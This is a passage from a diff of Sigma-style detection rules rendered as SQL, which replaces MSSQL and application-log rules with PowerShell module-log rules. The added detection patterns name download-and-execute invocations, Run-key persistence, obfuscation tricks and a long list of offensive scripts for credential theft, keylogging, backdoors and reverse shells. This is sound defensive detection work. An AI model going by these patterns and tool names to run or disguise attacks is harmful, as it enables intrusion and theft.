"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object 
System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' 
OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection 
Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" 
+ "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 
2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", "attack.impact", - "attack.t1499.004" + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" 
